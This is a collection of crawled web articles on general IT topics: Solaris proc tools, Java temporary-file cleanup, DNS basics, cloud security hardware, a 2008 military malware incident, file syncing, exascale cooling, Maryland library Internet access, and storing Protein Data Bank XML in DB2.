context. Existing recognition schemes for such mobile applications and pervasive devices are not particularly usable - they require active engagement with the person (such as the input of passwords), or they are too easy to fool." The Dartmouth research is supported by the National Science Foundation and by the US Department of Health and Human Services. Layer 8 Extra Check out these other hot stories:
<urn:uuid:5f887ce4-f162-498e-bf36-495d850220b0>
CC-MAIN-2017-04
http://www.networkworld.com/article/2222903/mobile-security/sensor-uses-body-s-electrical-signature-to-secure-devices.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00275-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936922
552
3.03125
3
Question 3: Solaris 10 OS, Part I Perform User and Security Administration Monitor system access by using appropriate commands Multiple Answer, Multiple Choice A process on the system suddenly stopped responding causing inconvenience to users. You use the /usr/bin/ps -eflL command to check the commands that might be running on the system and causing the problem. Which three commands can be the cause of the problem? (Choose three.) Running the pflags, pfiles or pstack command on a target process can cause the process to stop responding. When these commands are run they inspect the target process and report certain results related to the process. While inspecting, these commands stop the target process causing bottlenecks on the network. The plflags command is used to display the tracing flags of /proc and status of pending and held signal. The plflags command also displays the /proc status information about all lightweight processes (LWP) in the target process. The pfiles command is used to check the file status and control information about all files open for the target process. Additionally, this command can report the path to the files of the target process. The pstack command prints the hexadecimal format stack trace information for each LWP included in the target process. When you run the /usr/bin/ps eflL command, you can identify that these commands are the cause of the problem if their status is ‘T’ by default. Running the df command does not cause the process to stop responding. The df command displays the amount of free disk space on each mounted disk. This is generally 90 percent of the full capacity, and the remaining 10 percent is left for reporting statistics. The df command displays the amount of disk space occupied by currently mounted file systems, the amount of used and available space, and how much of the file system’s total capacity has been used. Running the pmap command does not cause the process to stop responding. The pmap command displays the address space map for each process. You can use the pmap command to resolve problems regarding lack of disk space on the system. You can use the pmap command with different options to display information related to anonymous and swap reservations for shared mappings, unresolved dynamic linker map names, reserved addresses, HAT page size, swap reservations per mapping, and additional information per mapping. Additionally, you can use this command to forcefully grab the target process even if another process has control. Solaris 10 Reference Manual Collection, man pages section 1: User Commands, User Commands, proc(1) proc tools, http://docs.sun.com/app/docs/doc/816-5165/6mbb0m9pd?a=view. Solaris 10 Reference Manual Collection, man pages section 1: User Commands, User Commands, pmap(1) display information about the address space of a process, http://docs.sun.com/app/docs/doc/816-5165/6mbb0m9oo?a=view. Solaris 10 Reference Manual Collection, man pages section 1: User Commands, User Commands, df(1B) display status of disk space on file systems, http://docs.sun.com/app/docs/doc/816-5165/6mbb0m9ee?a=view.
<urn:uuid:b3246f78-a389-4a9e-bdc4-d17cb9a79279>
CC-MAIN-2017-04
http://certmag.com/question-3-sun-certified-system-administrator-for-the-solaris-10-os-part-i/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280746.40/warc/CC-MAIN-20170116095120-00183-ip-10-171-10-70.ec2.internal.warc.gz
en
0.8367
695
2.640625
3
Modern programs usually employ operating system memory to handle transient data; however, programs that use large amounts of data (e.g. video editing, video transfer) may need to create temporary files. Programs need to delete temporary files when the usage is complete or when the programs exit. Some programs create temporary files but then leave them behind - they do not delete them. This can happen because the program crashed or the developer of the program simply forgot to delete them after the program is done with them. This may lead to a disk leak. In Microsoft Windows the temporary files left behind by the programs accumulate over time and can take up a lot of disk space. Personal workstations with UNIX-based operating systems do not suffer from the same problem because their temporary files are wiped at boot. Servers, however, are affected because they are rarely rebooted. In this post, I look at different ways to ensure that files created temporarily get deleted automatically in Java. Creating Temporary Files Java API File.createTempFile() enables the developer to create a temporary file under the operating system’s temporary directory, predefined by the runtime property “java.io.tmpdir”. One note for using this API is to check the current user’s access permission on the temporary directory. When a program runs in a plug-in or as a network service, it may not have WRITE permission on local disk. Forget to check the result of file deletion? The most straightforward way to delete a temporary file is to call File.delete() immediately after the code is done with the temporary file. However, in practice, the developer may forget to check the result of this API. The API returns a Boolean result False on the deletion failure. When it fails, the developer should find an alternate way to delete the temporary file delayed. Bind file deletion to garbage collection of reference objects Sometimes, the developer is not sure at which point the file is out of use, but he knows which object instance is using the file. In such case, it is appropriate to bind the file deletion to its referenced object’s garbage collection. Apache Commons provides a useful utility FileCleaningTracker to work in this way. public void track(File file, Object marker) - Track the specified file, using the provided marker, deleting the file when the marker instance is garbage collected. The normal deletion strategy will be used. But as we know, the JVM garbage collection does not execute timely as we expect, so please do not set an expectation that this way works perfectly. If the developer is intending to implement a file cleaner like this, please do not forget to check the file deletion result during the cleanup. Unfortunately, Apache FileCleaningTracker hasn’t checked it. There is still a potential disk leak. Mark a JVM Shutdown Hook Java developers are familiar with the API File.deleteOnExit(), which delays to delete the file when JVM terminates normally. Indeed, it is powerful; however, experienced developers do not use it often, as there are some constraints to use it. - - Is it too late to delete temporary files at the end of the program? YES to servers. Servers don’t shutdown frequently and it is wrong to resort to this API to delete temporary files. - - Is there some situation that the file does not get deleted? YES to WIN32 system. When the file is open, this API fails to delete it on JVM terminates. Besides these constraints, the developer needs to take care of potential memory leak when using this API. Since Java 6, Sun uses a LinkedHashSet to implement the shutdown hook. This hook expands gradually as long as the JVM is alive and it never shrinks. Java checks the hook only at the time when JVM terminates. Even if the file is deleted before JVM terminates, its information is still kept in the hook. As a result, the hook may lead to memory leak. As of so many reasons, it is not recommended to use JVM shutdown hook at server side. Write a custom File Cleaner In the complex programs, it is not bad to write a custom file cleaner to control the full lifetime of temporary files. Daemon threads are often used to execute the house cleanup periodically. One note is, it is very important to put logs to the code to track the temporary file’s lifetime. New Cake in Java 7 The NIO.2 feature in Java 7 brings a lot of useful file I/O functions. One option is to delete the file on close, Files.newOutputStream((Path path, OpenOption... options) where the option can be DELETE_ON_CLOSE. This is a good change that the new Java brings more native functions to Java developers. When the developer writes a program, firstly think about whether it really necessary to create temporary files in his/her program. There is a trade-off of requisitioning resources between memory and disk, corresponding to their cons and pros. If the answer is YES, the developer should choose or design a temporary file cleanup strategy best fit for the program, and being always keep the logging in mind.
<urn:uuid:6038e4ed-5098-465f-be32-c1da5a6ab40b>
CC-MAIN-2017-04
https://community.emc.com/blogs/weiz/2012/05/02/delete-temporary-files-in-java
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00577-ip-10-171-10-70.ec2.internal.warc.gz
en
0.923466
1,081
2.953125
3
Understanding Domain Name Service (DNS) DNS (Domain Name Services) are as fundamental to email and web services as address books and published street addresses and phone numbers are to other types of communications. Without them, it is difficult to connect with new people and organizations and it is even inconvenient to communicate with your friends and family. In this article, we cover the basic concepts involved in Domain Name Services (DNS) and domain registration, so that you can understand how they are involved in email and web hosting services. A DNS Example To understand what Domain Name Service (DNS) is and how it is used, it is best to start with an example: John Sample wishes to register and setup a domain for web site and email services. Here are the steps involved: 1. Registration of the Domain John goes to some company, such as LuxSci, and finds a domain name that he likes and which isn’t in use by someone else. He then registers it, paying a fee for one or more years. What does this registration actually buy him? It depends on the company he registered at and for what exactly he signed up; however, it usually only means that John has now leased the domain name for some period of time. He doesn’t actually “own” it, he just has the sole right to use it for some period of time, after which he has the right to renew his lease or let someone else have it. Note that when you register a new domain name [say at LuxSci], it will take up to 24 hours for that domain to become live and functional on the Internet. If you register it elsewhere, it may take longer. If you are thinking about using a service that provides “private domain registrations”, please see the Dangers of Private Domain Registrations and WHOIS Masking. 2. Sign up for web and/or email hosting John then contacts some company, such as LuxSci, to order hosting. A hosting company provides the computers on which John’s web site files will reside and/or which will accept email for John at this new domain name. …What is missing? DNS. Registration of the domain gave John a “name” on the Internet (e.g. johnsample.com); obtaining web or email hosting services gives him an “address” — the Internet addresses of the computers owned by the hosting compan(ies) that will be handling John’s web and email needs (e.g .220.127.116.11). What is missing is a connection between the easy-to-remember name and the actual addresses where the services reside. We like to make the analogy that DNS is like a “phone book” for domain names. It contains entries that indicate which Internet (Internet Protocol – IP) address corresponds to which domain name (and vice versa). You probably use DNS all the time and don’t even know it! Whenever you type an address such as “http://google.com” into your web browser, the web browser uses DNS to find out the numerical address(es) of the computers that handle Google’s web site; it then uses these addresses to connect to those computers to get the web site files. Thus, anyone who has a domain name that is to be used for email or web services needs DNS services as well. These services are usually provided by your web or email hosting company, because they know their computer addresses and should be in a position to update your DNS settings for you if any of their computer’s addresses need changing. You may be able to manage your DNS settings yourself if, for example, your domain registration company provides this service to you, or if you use a company like easyDNS (of which LuxSci is a partner and whose services LuxSci offers at a discount to its members). 3. Transfer your domain. If your web hosting company is going to take care of your DNS settings for you, you need to give them control over these settings. This means telling your domain registrar (Register.com in this example) what servers your web hosting company is going to be using for your DNS…. your web hosting company will tell you what to say. Now, you should have a rough picture of the complexity involved in managing a domain name — there are at least 3 sets of computers involved! - One set belongs to your domain name registrar. They keep track of what domains are registered, who currently “owns” them, and what computers manage the DNS settings for each of these domains. (This information is stored in a big database called the “WHOIS” database). - One set belongs to the company that manages the DNS settings for your domain. These computers understand what computer addresses correspond to what domain names. Other computers, like your web browser, can ask them to look up the name for an address, or vice versa. - The third set belongs to your web and email hosting company. On these computers, your web site files are stored and your email is delivered. These are almost always different computers than the ones that handle the DNS and WHOIS. Mail Exchange (MX) Records An “MX Record” is a DNS entry that indicates what server(s) handle inbound email messages for your domain. These can be, and usually are, different servers than those that handle your web site. They may also be different from the servers on which you email is stored. “MX” stands for “Mail Exchange”. Typically, you will have 2 or more MX records for your domain. One is primary; the others are secondary and will provide load balancing or failover for increased delivery reliability. E.g. in case one server is down, the others can still receive your email. MX Record Priority What is up with the MX record priority? These are numbers that go along with each MX record. The “priority” can be any number zero or higher (e.g. 0, 10, 14, 999, etc.). The priority is used only to sort the MX records. The mail server should try the MX record with the smallest numerical priority first, and if it fails to connect to that server, try the next one with the next highest priority. If multiple records have the same priority, one of them should be picked at random (or their use should be rotated). So, the actual numerical value of the priority doesn’t matter at all. It doesn’t matter if its “10” or “15” or “100”. All that matters is which numbers are bigger than which others and which ones are the same…. as this defines the priority of which servers are tried first and which ones are “load balanced” to some degree. If John Sample registered “johnsample.com”, then he really can have any number of domain names, as long as they each end in “.johnsample.com”. I.e. “www.johnsample.com”, “blog.johnsample.com”, and “my.daughter.johnsample.com” are all domains that John has a right to setup and use because he has registered “johnsample.com”. These are all called “subdomains” because you cannot register them individually, but get them if you register the domain “johnsample.com”. Subdomains are created when entries for them are made in the DNS for your domain. You can configure your DNS settings to use any addresses you wish for web and email for any of your subdomains. Your DNS provider should allow you to do this as a matter of course. If your subdomain is configured to point to another domain or subdomain name, rather than to a computer’s address, it is known as an “alias” or a “CNAME”. When a domain or subdomain points directly to a computer’s numberical “IP Address”, this is known as an “A record” (Address Record). For example blog.johnsample.com -> 18.104.22.168 (This is an A or “Address” record) blog.johnsample.com -> wordpress.org (This is an alias “CNAME” record, where your domain gets the address that wordpress.org has by referencing it by name). DNS Propagation: Time-To-Live (TTL) The “Time-To-Live” or TTL is an important DNS parameter that you should be aware of when you want to change your DNS settings. A TTL is roughly the maximum time that it can take for any change in your DNS to take effect all throughout the Internet. A small TTL setting, such as 20 minutes, will allow all your changes to propagate across the Internet in about 20 minutes or so, a large setting can result in the changes taking days to be noticed. A typical default setting can be 3 to 24 hours! Clients for whom LuxSci manages their DNS generally have their TTLs set to 3 hours, unless they request otherwise. Note that the TTL is also the time it will take for changes in the TTL to be effective…! This means that if your TTL is 1 day and you plan to make a change that needs to take effect in 15 minutes, then you should: - Change the TTL to 15 minutes - Wait 1 day for the change in TTL to propagate across the Internet - Any other changes to your DNS after this 1 day wait will then propagate in no more than 15 minutes. Why are DNS Changes not Instantly Available? The answer reflects the clever way in which DNS works. Your changes ARE available instantly on the actual computers that manage your DNS. In order to prevent everyone in the world from asking your DNS servers directly for your DNS information, which would bog them down greatly, DNS is set up so that people’s computers ask local DNS servers in their ISPs. These return the information if known, otherwise, they ask other “upstream” servers until eventually some server asks the main “authoritative” ones at your DNS provider. All of these intermediate servers keep the information so that they can give it out again quickly without asking the “upstream” servers again. This information is all remembered as long as your TTL is (without going into the fine details). For this reason, its takes a time equal to the TTL before all of these servers will refresh their information. It also means that some people will see your new DNS settings sooner than other people…. all based on when their DNS servers need to refresh their saved information. This distributed method of looking up DNS information is good because it is quick and minimizes the work your DNS provider’s servers have to do. It has the drawback that the other DNS severs have stale information whenever you change your DNS settings. To compensate, you can set your TTL to be small. Effectively, if a DNS server has information that is older than the TTL, the DNS server doesn’t trust that the data is accurate and goes to get a fresh copy when asked. This is why the time it can take your DNS changes to propagate across the Internet is approximately the TTL setting you have configured for your domain. Why not always use a very small TTL? There are two main reasons for that: - Speed: The smaller your TTL, the slower your email or web site will be … as computers and servers will have to be spending more time looking up and refreshing DNS information. - If your TTL is very small (e.g. sub 5 minutes) than some improperly configured DNS servers may disregard it and use a larger TTL. Less than 1% of DNS servers do this, but it can happen. DNS Text Records for Anti-Spam Protection Another form of DNS record is the “Text” record (TXT record). These allow you to have any arbitrary text associated with any domain. Anyone on the Internet can query your DNS and see what this text says and know that you, the person in charge of your domain, put it there. How is this useful? It can help stop forged and fake email: 1. SPF (Sender Policy Framework) Records With SPF records, you add some special instructions to your DNS that specifies which servers on the Internet are permitted to send email using your domain. Spam filters can use this when they look at email purporting to be from you to see if it was sent from your servers or not. If not, the message can be treated as Spam. For adding SPF to your domain, the SPF Wizard is useful. If you are a LuxSci customer, you would make a TXT record for your domain with the content “v=spf1 include:luxsci.com ~all”. See this help article for more details. 2. DKIM (Domain Keys Identified Email) Records With DKIM, your sending email server cryptographically signs each email that you send. The “public key” that can be used to verify this signature is published in your DNS. For details, see DKIM: Fight Spam and Forged Email by Signing your Messages. For More Information: - DNs at LuxSci – Not Your Daddy’s DNS - DNS and Domain Registration at LuxSci - Interview with Mark Jeftovic, CEO of easyDNS - Split Domain Routing: Getting your Email at Two Providers - Domain Registration and DNS Management: Relax We’ve Got Your Back - Reliability: How to choose a DNS Service that Shrugs off a Denial of Service Attack - DNS Price Cut! $0.99/month or $11.88/year - Better Forged Email Filtering with Improved SPF Support - Split Domain Routing: Getting Email for Your Domain at Two Providers
<urn:uuid:1c3634e6-8585-42df-b9a7-1419b56f5a79>
CC-MAIN-2017-04
https://luxsci.com/blog/understanding-domain-name-service-dns.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00393-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936706
2,934
3.125
3
Ensuring the security of one’s information in the cloud has proven to be problematic, especially considering the recent revelations regarding the National Security Administration and their accessing of data. Researchers at MIT sought to combat that security risk in proposing the building of Ascend, a hardware component that can be coupled with cloud servers and prevents two types of security risks on public information. “This is the first time that any hardware design has been proposed — it hasn’t been built yet — that would give you this level of security while only having about a factor of three or four overhead in performance,” said Srini Devadas, MIT’s Edwin Sibley Webster Professor of Electrical Engineering and Computer Science, whose group developed the new system. “People would have thought it would be a factor of 100.” While a performance penalty of a factor of three or four is certainly preferable to that of a hundred, those keen on running experiments in the cloud on generalized data may not be too willing to take on such a decrease. However, there are applications whose data is sensitive, particularly in the genomic and other related healthcare fields, where Ascend would be advantageous. According to MIT, Ascend works by randomly assigning access nodes. Every time Ascend traverses a path down the access tree to retrieve information from a node, it swaps the information with another random node somewhere in the file system. In this way, it becomes difficult for potential attackers to inferring specific data locations based on sequences of memory access. Further, Ascend would reportedly protect against timed attacks by sending requests at regular intervals to the memory, meaning a spyware application would be unable to determine the runtime of any other particular application. The importance of keeping one’s data secure is always there, even if it is variable from application to application. The performance penalty of Ascend, once it is built, may be worth ensuring data is kept out of curious hands.
<urn:uuid:5763ec96-20fb-4c5a-a62a-a12072648e09>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/07/07/mit_works_toward_cloud_data_protection/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280763.38/warc/CC-MAIN-20170116095120-00027-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945624
393
3.140625
3
The first sign of trouble was a mysterious signal emanating from deep within the U.S. military's classified computer network. Like a human spy, a piece of covert software in the supposedly secure system was "beaconing" — trying to send coded messages back to its creator. The government's top cyberwarriors couldn't immediately tell who created the program or why, although they would come to suspect the Russian intelligence service. Nor could they tell how long it had been there, but they soon deduced the ingeniously simple means of transmission, according to several current and former U.S. officials. The malicious software, or malware, caught a ride on an everyday thumb drive that allowed it to enter the secret system and begin looking for documents to steal. Then it spread by copying itself onto other thumb drives. Pentagon officials consider the incident, discovered in October 2008, to be the most serious breach of the U.S. military's classified computer systems. The response, over the past three years, transformed the government's approach to cybersecurity, galvanizing the creation of a new military command charged with bolstering the military's computer defenses and preparing for eventual offensive operations. The efforts to neutralize the malware, through an operation code-named Buckshot Yankee, also demonstrated the importance of computer espionage in devising effective responses to cyberthreats.
<urn:uuid:a795e2a4-284e-432c-a7be-343ba137000e>
CC-MAIN-2017-04
https://www.bleepingcomputer.com/forums/t/431717/cyber-intruder-sparks-massive-federal-response/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00478-ip-10-171-10-70.ec2.internal.warc.gz
en
0.959022
273
2.65625
3
For those people who have decided to store only one version of any file at given time, read no further: but don’t come crying if you lose your one and only copy! On the other hand, for those who want to copy, back up, share, or work on files from different locations and devices, here’s a short guide to online file synchronization – also known as syncing. Syncing Starts With the First File Copy The question of syncing arises as soon as you copy a file and change the original. Is it sufficient to copy the latest changes from one file to the other, and simply overwrite the destination file? Or is some more sophisticated system needed so that all changes, wherever they are made, can be safeguarded for later use? One-way syncing is a possible solution. In this case, any changes you make to the original (the master copy) are then reproduced in other known copies of the file. Online file storage solutions may offer the automatic mirroring of changes on a real time basis, or schedule backups at regular intervals. Whichever solution is used in one-way syncing however, no data is ever copied to the master copy, but only from the master copy. Now let’s say you have a file that exists on two or more different computing devices; a desktop PC in your office, a tablet PC at home and a smartphone you carry around with you, for instance. Depending on where you are – in your office, at home or out traveling, you might want to make modifications to the file on any of the devices. But you might quickly end up with divergent versions of the file that you cannot simply copy from one device to another without loss of data. Keeping Tabs on What Changes Where Online file storage providers have a solution here too. In this case two-way file synchronization copies changes in both directions: the idea of a master file doesn’t apply here, because all known copies of the file will be updated whenever a change is made in any one of those files. To do this, the online file storage provider must keep a database of information about files to be synchronized and indicate potential synchronization conflicts to the user. Choices for resolving the conflict may then include overwriting files, merging their contents or saving one or other changed version to a new file. Online File Syncing and Recovering Past Versions More advanced syncing includes version control: instead of just overwriting all the files each time a change is made to one of them, the previous version of the overwritten file is also saved (and perhaps the version before that, and so on…) This means you can recover a previous version of a file if you make a major change to the current version, and then wish you hadn’t done so. Backing up previous file versions online can also be handy when the file (and maybe also a folder of files) is synced not just between different devices, but between different users too. That way, you also have a chance of recovering a shared masterpiece if somebody else’s editing turns out to be too heavy-handed.
<urn:uuid:0ae2925b-23c3-4cee-8ee1-9a0d6cb3b63a>
CC-MAIN-2017-04
http://www.cloudwedge.com/quick-guide-online-file-storage-synchronization/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00294-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939109
643
2.765625
3
In a picturesque spot overlooking San Francisco Bay, the U.S. Department of Energy's Berkeley Lab has begun building a new computing center that will one day house exascale systems. The DOE doesn't know what an exascale system will look like. The types of chips, the storage, the networking and the programming methods that will go into these systems are all works in progress. DOE is expected to deliver to Congress by the end of this week a report outlining a plan for reaching exascale computing by 2019 to 2020 and its expected cost. But what the DOE does have an idea about is how to cool these systems. The Computational Research and Theory (CRT) Facility at Berkeley will use outside air cooling. It can rely on the Bay area's cool temperatures to meet its needs about 95% of the time, said Katherine Yelick, associate lab director for computing sciences at the lab. If computer makers raise the temperature standards of systems, "we can use outside cooling all year round," she said. The 140,000-square-foot building will be nestled in a hillside with an expansive and unobstructed view of the Bay. It will allow Berkeley Lab to combine offices that are split between two sites. It will also be large enough to house two supercomputers, including exascale-sized systems. "We think we can actually house two exaflop systems in it," said Yelick. The building will be completed in 2014. Supercomputers use liquid cooling, but this building will also use evaporative cooling. Under this process, hot water goes up into a cooling tower where evaporation helps to cool it. The lowest level of the Berkeley building is a mechanical area that will be covered by a gradient that is used to pull in outside air, said Yelick. An exascale system will be able to reach 1 quintillion (or 1 million trillion) floating point operations per second, which is roughly 1,000 times more powerful than a petaflop. The government has already told vendors that an exascale system won't be able to use more than 20 megawatts of power. To put that in perspective, a 20 petaflop system today is expected to use somewhere in the range of 7 megawatts. There are large commercial data centers, with multiple tenants, that are now being built to support 100 megawatts and more.
<urn:uuid:c0d74864-c27e-49ed-bf6e-d0b1e7c76cc8>
CC-MAIN-2017-04
http://www.computerworld.com/article/2501261/data-center/u-s--to-use-climate-to-help-cool-exascale-systems.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00414-ip-10-171-10-70.ec2.internal.warc.gz
en
0.959452
493
3.328125
3
Level of Gvt: State Problem/situation: While access to the Internet can provide important government information to residents of a state, most services are costly. Solution: Maryland introduced Sailor, a program that allows Maryland residents to visit the Internet through the state library for free. By David Noack While state and local governments across the country continue to place information on the Internet, Maryland has become the first state to offer free access for its residents to the global collection of networks. The ambitious project, called Sailor, provides residents with the opportunity to tap into global, state and local libraries and databases brimming with information, news and research materials. Additional services, such as e-mail and file transfer, costs about $35 per year. The system, developed by the Maryland Department of Education's Division of Library Development and Services, also offers access to more than a dozen libraries and research databases, community news, and state and local government information. Users can locate churches or child care centers in their area, find out if the book they're looking for is available and learn more about the Maryland Legislature or a particular state agency. MARYLAND GENERAL ASSEMBLY Residents - or anybody else with an interest in state government - can get historical, biographical and legislative information about the Maryland General Assembly using Sailor. There are also biographies of state senators and members of the House of Delegates. Information on a number of state agencies such as the Governor's Office, Public Broadcasting Commission and State Lottery Agency is available. Sailor debuted last summer. The project was partially funded by a $2 million federal grant and officials are seeking ongoing state funding to maintain and improve the system. When Sailor is complete, it will be capable of handling 600 dial-in telephone lines and modems. While library systems across the country are beginning to provide Internet access on a localized basis, Maryland offers statewide access for the cost of a local telephone call. Officials hope to have local phone access provided for the state's 3.5 million residents in 24 counties by this summer. Examples of other libraries providing free or low-cost Internet access include the Morris County Public Library System in New Jersey, which last year inaugurated an Internet project called MORENET, and earlier this year, the Baltimore County Public Library began offering full service dial-up Internet accounts for a small fee, which includes e-mail, Telnet, File Transfer Protocol and access to the World Wide Web via a text-based browser called Lynx. Because Sailor is overseen by the state Department of Education, many of its resources are geared toward education. "We are looking at how to get state budget and legislation action online," said Maurice Travillian, assistant superintendent of the state Department of Education. Barbara G. Smith, Sailor project manager, said the system was designed with the public in mind. "Sailor enables Marylanders of all ages to begin to use the Internet. It is widely used in schools and many people dial-in from their home or office. Numerous colleges and universities make it available through campuswide information systems," said Smith. Sailor grew out of a librarian networking project started in 1992 called Seymour, which was in response to a request from the State Library Networking Coordinating Council. In early 1993, the Computer Science Center at the University of Maryland at College Park (UMCP) suggested that a Gopher server be used to create a publicly-accessible Internet system, replacing Seymour. Smith said that even though the name of the project has changed, the goals and mission statement - rapid, easy access to information - remains the same. "We learned a lot from the original Gopher at UMCP and that knowledge became the foundation for the current Gopher," he said. "We really like Gopher as a way to get this service started. It's friendly, most computers will work with it, our 56KBs network will support it, and we can load a variety of files we've begun to collect at the state and local level." THE LIBRARY TREND The continuing movement among libraries to offer Internet access is far removed from the original mission of the global computer "network of networks." The Internet initially started in 1969 as a defense and research networking tool to be used in case of nuclear war. The decentralization of the network - with no central access point or command center - made it difficult for a warhead to disable the entire network. Over the last 25 years, however, the Internet evolved from its defense and research roots to where it's now used by an estimated 30 million people in a variety of ways, from e-mail and transferring files to accessing databases. What's attracting many new users, who usually gain access through use of commercial or fee-based Internet Service Providers (ISPs), is the vast amount of information and resources available. While Sailor provides Maryland residents with a free peek into the Internet window of resources, some features common to commercial ISPs are unavailable unless an account is established. Travillian of the Department of Education said a main reason statewide Internet access was provided is to keep pace with the way information is rapidly being adapted to electronic platforms. "The information used to be in books or in magazines and newspapers and the library collected them. It's now digitized," Travillian said. "The supply of our information is coming in a different form, [so] the library has to provide it in a different way." One of the most popular features of the system is an employment database, which provides information on local, state, federal and private sector job opportunities. And as state and local government information is added to the system, localities view it as a way to promote their county or town to spur tourism and economic development. "Some local governments are jumping on this," Travillian said. "Some counties have been eager to bring their information [online] and see it partly as a tourist thing that will help bring people in and also as an economic development tool." Sailor project manager Smith said one of the advantages of providing access to the information superhighway is that people not accustomed to it are "amazed" by its capabilities. "Librarians have been organizing access to information for centuries, and now we are bringing those same skills to the Internet," she said. "At the same time, we are opening access for people who might not have the opportunity. We are leveling the playing field." [June Table of Contents]
<urn:uuid:d4cda5c8-b549-4eb9-8c25-512c74538e56>
CC-MAIN-2017-04
http://www.govtech.com/magazines/gt/Maryland-quotCybrariesquot-Offer-Internet-Browsing-.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00258-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950954
1,324
2.53125
3
The Protein Data Bank (PDB.org) is a worldwide archive of structural data about biological molecules, mostly proteins. The Protein Data Bank (PDB) is managed by several member organizations responsible for depositing, maintaining, processing, and freely providing this biological data to the scientific community. To provide flexibility, extensibility, and ease of data exchange, the PDB data is available in XML format. This XML format is defined by an XML Schema known as the Protein Data Bank Markup Language (PDBML). The structural information includes the 3-D coordinates of the atoms of the molecule(s) a protein consists of. These atomic coordinates are also referred to as the 3-D structure or tertiary structure. The tertiary structure of a protein is closely coupled to its function. Thus, knowing the tertiary structure often helps in understanding the protein's intrinsic function. For example, the tertiary structure may be useful to explain diseases or develop new drugs. The tertiary structure can also be exploited to search the PDB for interactions between proteins. As of December 2010, the Protein Data Bank repository held 70,000 entries (XML documents) that contain more than 500 million atom coordinates. The total uncompressed size is more than 750 GB. Individual XML documents in the PDB range from a few MB to more than 1 GB in size. Based on the rapid growth of the PDB repository in recent years (Figure 1), the size of the PDB is expected to continue to increase significantly. Consequently, searching and analyzing this information is becoming ever more challenging. Figure 1. Growth of the PDB over the past 20 years A typical approach to analyze PDB data is to write a custom application or a set of scripts that search the PDBML documents for the purpose of a very specific research question. The disadvantages of this approach include the facts that: - Developing custom code each time new research is being conducted is very labor-intensive and time-consuming. - The performance is often poor because all documents need to be parsed and searched, even if only a subset of them contain relevant information. - It's often difficult to reuse or combine existing custom code to compose new or different queries against the PDB data. DB2 V9.7.3 with pureXML was chosen to address these challenges, primarily because DB2 has the scalability and the XML capabilities required to process the expected volumes of PDBML documents. Additionally, DB2 is freely available for non-commercial usage via the IBM Academic Initiative. The goal was to store the PDB information in an efficient database schema, exploit relational and XML indexes for efficient search, and use XQuery and SQL/XML to express even complex queries against the PDB information. The content of the Protein Data Bank Before we discuss the DB2 database design for the PDB, it is helpful to understand the PDB data a little bit better. The tertiary structure of a protein is experimentally determined (solved), predominantly by a method called X-ray Diffraction or X-ray Crystallography. Another less frequently used method is called Solution NMR (Nuclear Magnetic Resonance) or NMR Spectroscopy. The methods for determining (solving) the protein structure lead to differences in how a protein structure is described in the generated XML documents, which is particularly reflected in the XML file sizes. Proteins are dynamic molecules, which means that their tertiary structures may vary slightly, for example depending on their environment. Due to these variations, NMR methodically determines multiple instances (models) that represent slightly shifted tertiary structures for the same protein. Consequently, XML files with protein data produced by NMR can be very large in size, such as 100 MB to 1 GB, or more. Also, you will see later in this article how and why we use DB2 range partitioning to separate the first (default) model of a protein from its variations. Listing 1 shows an extract from one PDBML document. You can see four of 177 categories of information that can appear in such a document, including the authors of the study and the experimental method <PDBx:exptlCategory>) used. The attribute represents the unique PDB identifier for this document. Listing 1. Extract of a sample PDBML document (1BBZ.xml) ... <PDBx:audit_authorCategory> <PDBx:audit_author pdbx_ordinal="1"> <PDBx:name>Pisabarro, M.T.</PDBx:name> </PDBx:audit_author> ... </PDBx:audit_authorCategory> ... <PDBx:structCategory> <PDBx:struct entry_id="1BBZ"> <PDBx:pdbx_descriptor>ABL TYROSINE KINASE, PEPTIDE P41 </PDBx:pdbx_descriptor> <PDBx:title>CRYSTAL STRUCTURE OF THE ABL-SH3 DOMAIN COMPLEXED WITH A DESIGNED HIGH-AFFINITY PEPTIDE LIGAND: IMPLICATIONS FOR SH3-LIGAND INTERACTIONS </PDBx:title> </PDBx:struct> </PDBx:structCategory> ... <PDBx:struct_keywordsCategory> <PDBx:struct_keywords entry_id="1BBZ"> <PDBx:pdbx_keywords>COMPLEX(TRANSFERASE/PEPTIDE) </PDBx:pdbx_keywords> <PDBx:text>COMPLEX (TRANSFERASE-PEPTIDE), SIGNAL TRANSDUCTION,SH3 DOMAIN, COMPLEX (TRANSFERASE-PEPTIDE) complex </PDBx:text> </PDBx:struct_keywords> </PDBx:struct_keywordsCategory> ... <PDBx:exptlCategory> <PDBx:exptl entry_id="1BBZ" method="X-RAY DIFFRACTION"> <PDBx:crystals_number>1</PDBx:crystals_number> </PDBx:exptl> </PDBx:exptlCategory> ... The test database Due to time and resource constraints, we decided to use only a subset of the total available PDB data volume to prototype and evaluate the storage, indexing, and querying of PDBML documents in a DB2 database. Therefore, a representative sample of 6,029 documents was selected, which amounts to 83 GB and roughly 10 percent of the total volume of the PDBML archive as of December 2010. This set of documents contains approximately 1.7 billion XML elements, out of which approx. 1.54 billion elements describe tertiary protein structures through atom coordinates and other information. A representative sample of PDBML documents must accurately reflect the ratio of documents with molecule information produced by X-ray Diffraction (smaller documents, 83 percent of all documents) vs. Solution NMR (larger documents, 16 percent of all documents). This ensures that the database configuration and queries are tested with a realistic mix of small and large documents. The database server available for this study was a Sun X4600 M2 with eight dual-core processors (AMD Opteron 8220) and 256GB main memory. The operating system was Ubuntu 64-bit Linux®. The storage consisted of 10 hard drives (698 